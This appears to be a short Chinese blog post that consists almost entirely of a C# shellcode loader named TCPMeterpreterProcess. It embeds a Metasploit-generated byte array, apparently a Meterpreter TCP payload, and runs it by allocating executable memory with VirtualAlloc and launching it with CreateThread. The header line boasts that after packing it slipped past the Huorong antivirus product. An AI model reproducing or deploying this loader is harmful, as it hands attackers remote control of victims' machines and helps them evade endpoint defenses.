未免杀,加壳之后过了火绒
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
namespace TCPMeterpreterProcess
{
class Program
{
static void Main(string[] args)
{
// native function’s compiled code
// generated with metasploit
byte[] shellcode = new byte[] { 0xdd,0xc1,0xd9,0x74,0x24,0xf4,0x5b,0xb8,0x74,0x2f,0x00,0xb6,0x31,0xc9,0xb1,
0xb8,0x83,0xc3,0x04,0x31,0x43,0x13,0x03,0x37,0x3c,0xe2,0x43,0x6e,0x84,0x3b,
0xdf,0xb4,0xfd,0x01,0xdc,0x06,0x95,0x91,0x42,0x57,0xaf,0xd3,0xcc,0x14,0xc0,
0xe8,0x1e,0x75,0x0b,0x12,0x0e,0x61,0x63,0x89,0x83,0x59,0xc7,0x79,0x95,0x08,
0x5a,0x55,0x18,0x2f,0xf3,0x33,0x86,0xa3,0x1c,0xbb,0xdb,0xef,0xfe,0x6a,0xf7,
0x73,0x60,0x88,0x14,0x2d,0x22,0x1b,0xc3,0x15,0x43,0xfb,0x8d,0xdc,0xd7,0x0e,
0x8c,0x66,0x2d,0xa1,0x6f,0xa4,0x51,0xb9,0x6f,0x75,0x15,0x9b,0x60,0x38,0x3b,
0xb4,0xba,0x50,0xc3,0xbf,0x52,0xb5,0x42,0xe4,0x6e,0xf8,0x0c,0x9f,0xf9,0xd7,
0xa4,0x85,0x15,0x1b,0x63,0xb9,0xf2,0xd2,0x8c,0x1e,0x88,0x6a,0x87,0x6a,0x4a,
0xac,0x00,0x62,0xe4,0x5d,0x0c,0x4b,0x9e,0xd8,0x69,0x6a,0x3f,0xdf,0x02,0x3d,
0xae,0x14,0x6c,0x71,0x25,0x1b,0x95,0xb2,0x73,0x27,0x26,0x17,0x5d,0xd9,0x5f,
0x87,0xa9,0xd6,0xd7,0x05,0xbc,0xef,0xe5,0x15,0x4b,0xf0,0xf8,0x84,0xda,0x5d,
0xed,0x4b,0xcf,0x83,0xe9,0xf0,0x82,0x67,0x2d,0x6e,0xbf,0x5f,0xbf,0x06,0x5a,
0x9c,0x9c,0x3b,0x13,0x0d,0x97,0xb5,0xde,0x5e,0xea,0x02,0xe8,0xd7,0x12,0x57,
0x83,0xee,0x76,0xbc,0x89,0xc0,0xaa,0x44,0x08,0x34,0xce,0xa6,0x97,0xb6,0x7e,
0xe9,0xeb,0x18,0x0f,0x41,0x98,0xff,0x2f,0xa8,0xa7,0x57,0xbe,0x82,0x66,0x38,
0x87,0x38,0x88,0x04,0xc4,0x6a,0x38,0x3c,0xbc,0xda,0xa7,0x0c,0xbf,0xf1,0x04,
0xa3,0x37,0xe7,0x94,0xda,0xde,0x1b,0x98,0x29,0xd5,0x97,0x6c,0x59,0x76,0x73,
0x22,0x48,0xde,0xf4,0xa4,0x4d,0xb3,0xa9,0xe5,0xce,0x3f,0x76,0x29,0x2a,0xc6,
0x5f,0x07,0x34,0xa2,0xce,0x7a,0x5f,0x0d,0x8b,0x43,0x08,0xa8,0x16,0x44,0x98,
0x16,0x11,0x6d,0x1b,0x93,0x6f,0x8f,0xe8,0x34,0x94,0x45,0x82,0x01,0x03,0xae,
0x5a,0x08,0x63,0xa3,0x02,0xf6,0xcb,0x40,0x77,0x84,0x0e,0x52,0x86,0x16,0x45,
0xa4,0xc9,0x28,0x55,0x76,0x80,0x68,0x9f,0xa1,0x15,0xc6,0x02,0x42,0xc1,0x95,
0x57,0xf8,0xe6,0x84,0x6b,0x54,0x9a,0xa2,0xbd,0xac,0x1e,0xf1,0x1b,0x85,0x87,
0x6d,0x32,0x53,0x0c,0x23,0xb4,0xe4,0x02,0xbb,0x2b,0x91,0xc4,0x63,0xd4,0xbc,
0xe9,0x1a,0x69,0x2a,0x1c,0x3e,0x8d,0x9e,0x9a,0xe4,0xc0,0xf5,0xd8,0x25,0xe6,
0x34,0xac,0x84,0x97,0xb1,0x3f,0xb9,0xd6,0xc8,0xbd,0x2e,0x97,0xd2,0x36,0x5c,
0x91,0x4e,0x0b,0xe5,0x7e,0x4b,0x1d,0xca,0x2f,0x53,0xe2,0xdf,0x53,0x8b,0xf4,
0x6a,0x7f,0xd8,0x04,0x1e,0x14,0x59,0xec,0x91,0x20,0x4f,0x25,0x00,0x6b,0xff,
0x4b,0x70,0x3a,0x9a,0xc5,0xeb,0xac,0xf8,0x39,0x8f,0x02,0xc3,0x9f,0x23,0x6a,
0x1a,0x0a,0x47,0x16,0xba,0x33,0x9e,0x2a,0x22,0x98,0xbc,0xee,0x2e,0x14,0xdf,
0xa2,0x6a,0xaa,0x6b,0xc1,0x5c,0xe1,0x41,0xeb,0x71,0x92,0x14,0x17,0x23,0x84,
0x3d,0x34,0xb8,0x29,0xe4,0xea,0x09,0xa5,0xa0,0x97,0x4f,0x03,0x54,0x0b,0x3f,
0x2c,0x06,0x6d,0x16,0xbd,0xdc,0x5b,0xe4,0x80,0x7b,0x1d,0xe2,0xd2,0xb4,0x7a,
0x84,0x9c,0xe9,0x0c,0x2f,0x38,0xeb,0x21,0x1a,0x2e,0xe1,0xbe,0xf1,0x75,0x67,
0xf5,0xe3,0xcb,0x58,0x38,0xfe,0x11,0xd6,0xfd,0x01,0x5d,0x7c,0xb8,0xeb,0xc9,
0x7c,0x23,0xbb,0x9d,0x6f,0xfe,0xda,0x10,0xa0,0xbe,0xd7,0x29,0xb0,0xc5,0xd4,
0xfa,0x95,0xfe,0x0b,0x74,0x63,0x8a,0x5b,0xf5,0xa0,0x2b,0x6e,0xf2,0xb5,0x9b,
0xf3,0x21,0x8f,0xb0,0x7d,0x03,0xf7,0xc2,0xea,0x40,0x99,0x95,0x8a,0xea,0x2c,
0x7b,0x52,0x04,0x37,0x48,0xe9,0x5a,0x8e,0x5c,0x50,0xc5,0xe6,0xe3,0x63,0xcf,
0x7c,0x11,0xf5,0x7c,0xfb,0x3f,0x60,0x6e,0xae,0x4a,0x8e,0x28,0x11,0xf2,0xe8,
0x76,0xde,0xb7,0x15,0x30,0xd7,0x3d,0x3a,0x7f,0xd9,0x46,0x29,0xe4,0x50,0x0e,
0x85,0x3c,0x27,0x60,0x0e,0xd4,0x4d,0x25,0xbf,0xfe,0x49,0xb5,0x1a,0x25,0x3f,
0x7d,0x0d,0xb8,0x7f,0x59,0x3f,0xdf,0xc8,0x76,0x22,0xa1,0x94,0xec,0x88,0x12,
0x57,0x48,0x2e,0xb2,0x4f,0x1c,0x40,0x84,0xd1,0x6c,0x97,0x56,0xb7,0xb6,0xba,
0xe4,0x8f,0xad,0x09,0x13,0x0a,0x4b,0xad,0xa0,0xc8,0xa2,0xe1,0xe8,0x7d,0x5d,
0x09,0xa8,0x37,0x25,0x0b,0xb1,0xb5,0x4c,0x81,0x3f,0x23,0xe0,0x19,0x40,0xed,
0x55,0x5f,0x3d,0x3c,0x64,0x36,0x3a,0xd4,0xb6,0x8a,0xbd,0x0b,0xf0,0xcc,0xaf,
0xd8,0x1a,0x32,0x1d,0x00,0xd1,0x45,0x5d,0x8c,0xc9,0xe0,0xc5,0x47,0xfc,0xc3,
0x90,0x43,0x5b,0xdc,0xb0,0x75,0x4d,0xda,0x89,0x8a,0x4e,0xbb,0x74,0x71,0xc8,
0xe0,0x2a,0xbe,0xca,0xc7,0x5b,0x80,0x3b,0xf7 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(
string lpFileName
);
[DllImport("kernel32")]
private static extern UInt32 GetLastError();
}
}
4839
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
